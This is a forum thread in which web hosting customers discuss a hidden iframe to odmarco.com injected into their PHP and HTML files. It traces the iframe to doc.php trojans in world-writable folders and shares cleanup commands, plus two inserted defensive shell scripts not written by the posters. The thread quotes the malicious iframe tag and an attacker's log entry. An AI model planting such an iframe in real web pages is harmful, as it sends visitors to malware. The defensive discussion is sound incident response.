Odmarco.com


#1

I went on to some of my sites tonight and found a very odd iframe inserted at the bottom of some of my index.php files:

<iframe src="http://odmarco.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>

Does anyone know what this is? I haven’t been able to find any real information online and I just submitted it to SiteAdvisor for testing.


#2

Considering that the domain is Russian and was registered yesterday, this can’t be a good thing.

-Scott


#3

I also just got this on quite a few of my sites, along with an iframe from google-stat.com.


#4

It’s likely a Luckysploit kit.

Which webscripts and plugins are you running on your sites?

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost


#5

I have sites with vbulletin, game site script, Uploaderv6.1 by celrondude, open-x, gallery 2.2.


#6

On the infected sites I am running Coppermine, Efiction, Enthusiast, and sundry other small ones like vs.hive and Easy Banner. I’m not running any of the ones Racerxxx is, though.

I can’t think of a script that I run on each of the three infected domains that doesn’t also run on some or all of my other four domains that are not infected (my domains are all under different users). I don’t have any script common to just the infected ones. So it’s really beyond me.


#7

Do you have all of your PHP files writable? You should make everything read-only (except for directories that need write permissions, like forum avatar and file upload directories). It’ll stop hacks from writing to your web files, but it won’t stop MySQL injection vulnerabilities in some PHP software.

Some FTP and SFTP/SCP clients support permission settings on files, like the FireFTP FTP client (Firefox plugin) and the WinSCP SFTP/SCP client.


If you are looking for some Dreamhost promo codes you can find some here.


#8

First thing I’d do is test for Conficker on your PCs.


#9

I just experienced this on one of my websites; it has been appended to every .html file on the 30th, including files in directories which are not publicly accessible, so I assume it is an internal attack: either the web server is compromised or I have a dodgy script?

I have Invisionboard and PHPFreechat. Ultraboard? Not much else. I have some 664 .html files that are recently modified but seemingly not infected.


#10

I also found one .php with the code appended. The .php file was mostly HTML, I’m not sure why other php files are not affected but it seems very likely that this could have been much worse than it was…

I am on Planters if that matters.


#11

Okay some more info.

I found the file which started it all: doc.php
It was in a 777 directory, although I don’t know why; just because it is 777 doesn’t mean anyone can upload to it… right???

IP address related to it was 24.36.9.246

So just search your logs for the IP on the same date as the .html files were modified. (logs and file dates may not match because your FTP program translates them to your local time… took me a bit…)

Here is the only error log I have which relates to a rather massive file change.

24.36.9.246 - - [30/Mar/2009:23:22:34 -0700] "POST ***/doc.php HTTP/1.1" 200 34686 "-" "libwww-perl/5.805"

Good luck…
I had not selected Enhanced Security on all my sites, god damn I have now!
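An added example (not from any poster in this thread) of the log triage step described in the post above: filter an Apache combined-format access log for successful POSTs to a file named doc.php, then summarise the client IPs, dates and user agents so they can be lined up with the files' modification times. The log lines are constructed for the demo; the client IP and the libwww-perl agent match the entry quoted above, while the request paths and the other hosts are invented.

```shell
#!/bin/sh
# Added example, not from the thread: triage an access log for the POST-to-doc.php
# pattern described in post #11. Sample lines are constructed; the client IP and
# user agent match the entry quoted in that post, the paths and other hosts are invented.

SAMPLE_LOG='203.0.113.7 - - [30/Mar/2009:23:20:01 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
24.36.9.246 - - [30/Mar/2009:23:22:34 -0700] "POST /images/doc.php HTTP/1.1" 200 34686 "-" "libwww-perl/5.805"
24.36.9.246 - - [30/Mar/2009:23:22:35 -0700] "POST /gallery/doc.php HTTP/1.1" 200 34702 "-" "libwww-perl/5.805"
198.51.100.9 - - [31/Mar/2009:08:10:12 -0700] "GET /doc.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"'

# Combined log format split on whitespace: $1 client IP, $4 "[dd/Mon/yyyy:hh:mm:ss",
# $6 the quoted method ("POST), $7 the request path, $9 the status code.
# Keep only successful POSTs to a file named doc.php (the dropped script).
# With no arguments the functions read the log from stdin; otherwise from the files given.
suspicious_posts() {
    awk '$6 == "\"POST" && $7 ~ /\/doc\.php$/ && $9 == "200"' "$@"
}

count_suspicious_posts() {
    suspicious_posts "$@" | awk 'END { print NR }'
}

# Hits per client IP, so the source can be reported to support or blocked.
posts_by_ip() {
    suspicious_posts "$@" | awk '{ c[$1]++ } END { for (ip in c) print ip, c[ip] }' | sort
}

# Distinct dates (in the log's local time) on which those POSTs occurred; compare
# them with the files' mtimes in the same time zone, not the one the FTP client shows.
dates_of_posts() {
    suspicious_posts "$@" | awk '{ split($4, d, ":"); print substr(d[1], 2) }' | sort -u
}

# User agents seen on those requests (a scripted client like libwww-perl stands out).
agents_of_posts() {
    suspicious_posts "$@" | awk -F'"' '{ print $6 }' | sort -u
}

# Demo run against the constructed sample; point the functions at the real access.log instead.
printf '%s\n' "$SAMPLE_LOG" | posts_by_ip
printf '%s\n' "$SAMPLE_LOG" | dates_of_posts
printf '%s\n' "$SAMPLE_LOG" | agents_of_posts
```

The status-code filter matters: a scanner probing for doc.php on a site that never had it shows up as a 404 GET and is noise, while a 200 on a POST means the script was there and answered.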


#12

PHP can write to user-writable files since it is run as your user and not under a different user like apache; you have to have them set to 444 (r--r--r--) for files or 555 (r-xr-xr-x) for directories for them not to be writable by PHP.


#13

I have McAfee on my laptop and Norton on my PC. I just scanned both and neither appears to be infected. I’ll just go through and secure my sites, change my passwords, and then make sure all files/folders are not at 777.

When I plugged in the code through McAfee, I was told that the code was something like Exploit-Iframe (yeah, not too helpful there) and Backdoor-CUS!PHP. Only, they weren’t on my computer, just on the webpages. Neither my laptop nor my PC were ever infected with either, just the two sample pages I saved and scanned.

I did find a doc.php, too, so I am scanning for those on my websites.


#14

PERL hackers. Get Support to go through all your logfiles and they can block the source.


#15

I’m not an expert but would it be possible to try a kind of ‘search and replace’ on all files and delete the offending line? Something with ‘grep’? It seems all .html files on all my domains have the infamous iframe injection from odmarco.com.


#16

It depends on the consistency of the injection involved. You could use a stream editor, but you need to be absolutely positive that your matching string doesn’t share a line with anything else or it’ll quickly leave you with broken pages.


#17

Here’s a way to get rid of them
http://linuxsysadminblog.com/2009/03/heurtrojanscriptiframe/


#18

I found the source… I think. Some folders that were (for some reason) set at 777. Inside each of them was a doc.php file that contained the trojan. It seems that it got in that way and infected all index.php files and any file with a .html or .htm extension. I changed my passwords and fixed the permissions on the folders in question and I haven’t seen the problem come back. I do want to find the IP address and block it, too, but that will take some more in-depth searching.


#19

It looks like 777 folders are the cause of this exploit. Dreamhost told me to check my installed apps, but I have no similar apps across some of my infected sites, they all had 777 folders though.

Did you guys have ‘Enhanced Security’ selected as well for your User? I didn’t and I am suspecting it could be a compromised user on the same machine, but probably isn’t.

I’m no Unix nerd, but I spent a few days gathering commands to fix this problem. I hope it helps because this stuff is very hard to find. Real world examples of command usage are terribly poor for Unix. ps: I hate unix, freakin ancient legacy command line system with absolutely no consistency in structure and woeful documentation.

To unset all writable folders/files for “Group” and “Public” access. Log into Shell (select Shell access for your user, telnet to yourmachine.dreamhost.com) and do this:

chmod -R go-w *

That won’t change any files unless they had write allowed for Group or Public, and it only unsets the write status.
You can use PuTTY, or in Windows go to Run and type Telnet. Then type ‘open’ and put in your machine address, foobar.dreamhost.com etc. Type ‘exit’ to quit. It is Unix so don’t even try to find help; Unix is useless for help docs.

find all files writable by “Public”

find ./ -perm -o=w

find all files writable by “Group”

find ./ -perm -g=w

find total matches of a word in all files

find ./ -name '*.html' -print0 2>/dev/null | xargs -0 gawk 'BEGIN{ sum1=0; sum=0 } { sum1 += gsub(/odmarco/, "", $0); sum += sum1; if (sum1 > 0) { print sum1, FILENAME } sum1=0 } END{ print sum }'

find all .php files created between 2 and 6 days ago.

find ./ -name '*.php' -mtime +1 -mtime -5

Find and replace text in all .html files (you may need to do .htm and .php as well) in current directory and below, which are modified between 2-6 days ago. (If you want to write your own text to be found, put backslashes before all forward slashes and any weird characters. It starts at

find ./ -name '*.html' -mtime +1 -mtime -5 -print0 2>/dev/null | xargs -0 -n1 gawk 'BEGIN{ rtimes=0 } { rtimes += gsub(/<iframe src="http:\/\/odmarco\.com\/tomi\/\?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>/, "", $0); print $0 > (FILENAME ".tmpfix") } END{ close(FILENAME ".tmpfix"); if (rtimes > 0) { print rtimes, FILENAME; system("cp \"" FILENAME ".tmpfix\" \"" FILENAME "\"") } system("rm -f \"" FILENAME ".tmpfix\"") }'
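An added example, written for this page and not taken from any poster, that covers the clean-up asked about in #15, the caveat raised in #16 and the permission fix from the post above: it removes exactly the tag quoted in #1 from .html, .htm and .php files while keeping the rest of each line (so a tag appended to the `</html>` line does not take the closing markup with it), then revokes group/world write with `chmod -R go-w`. The demo directory tree built by `make_demo_tree` is constructed for this example; run the functions against your own web root instead.

```shell
#!/bin/sh
# Added example, not from the thread: strip exactly the injected tag from post #1
# out of every .html/.htm/.php file under a directory, leaving the rest of each
# line intact, then revoke group/world write as post #19 does with chmod go-w.
# The directory tree built by make_demo_tree is constructed for this example.

# The injected tag as quoted in post #1 (with the closing tag post #19 matched on).
IFRAME_TAG='<iframe src="http://odmarco.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'

# Escape a fixed string for the left side of a sed s|...|...| command:
# the BRE specials \ . * [ ] ^ $ and our delimiter | become literals.
sed_escape() {
    printf '%s' "$1" | sed 's/[][\.*^$|]/\\&/g'
}

# Candidate files: the extensions the thread reports as rewritten.
web_files() {
    find "$1" -type f \( -name '*.html' -o -name '*.htm' -o -name '*.php' \) -print0
}

# Dry run: "path:count" for every file still containing the tag (fixed-string match).
count_injected() {
    web_files "$1" | xargs -0 grep -cHF -- "$IFRAME_TAG" 2>/dev/null | grep -v ':0$'
}

# Remove every occurrence of the tag from one file. Writing back with cat keeps
# the file's inode and mode; a whole-line delete ("/odmarco/d") would also drop
# legitimate markup such as "</body></html>" when the tag was appended to that line.
clean_file() {
    f=$1
    pat=$(sed_escape "$IFRAME_TAG")
    sed "s|$pat||g" "$f" > "$f.tmpfix" && cat "$f.tmpfix" > "$f"
    rm -f "$f.tmpfix"
}

# Clean only the files that actually contain the tag.
clean_tree() {
    web_files "$1" | xargs -0 grep -lF -- "$IFRAME_TAG" 2>/dev/null |
        while IFS= read -r f; do clean_file "$f"; done
}

# Revoke group and world write bits on the whole tree (post #19's chmod go-w).
harden_tree() {
    chmod -R go-w "$1"
}

# Constructed demo tree: one page with the tag appended to the </html> line, one
# clean page, and a PHP file in a 777 upload directory with the tag on its own line.
make_demo_tree() {
    d=$(mktemp -d "${TMPDIR:-/tmp}/odmarco_demo.XXXXXX")
    mkdir -p "$d/uploads"
    printf '<html><body>Hello</body></html>%s\n' "$IFRAME_TAG" > "$d/index.html"
    printf '<html><body>Clean page</body></html>\n' > "$d/about.htm"
    printf '<?php echo "x"; ?>\n%s\n' "$IFRAME_TAG" > "$d/uploads/index.php"
    chmod 777 "$d/uploads"
    printf '%s\n' "$d"
}

# Demo run: show the hits, clean, harden, show that nothing is left.
DEMO=$(make_demo_tree)
echo "before:"; count_injected "$DEMO"
clean_tree "$DEMO"
harden_tree "$DEMO"
echo "after:";  count_injected "$DEMO"
rm -rf "$DEMO"
```

Run `count_injected` first as the dry run, check that the reported files are the ones you expect, and only then run `clean_tree`; if the attacker used a slightly different tag on some pages, those files will still show up in a second `count_injected` with the tag string adjusted, rather than being silently mangled by a looser pattern.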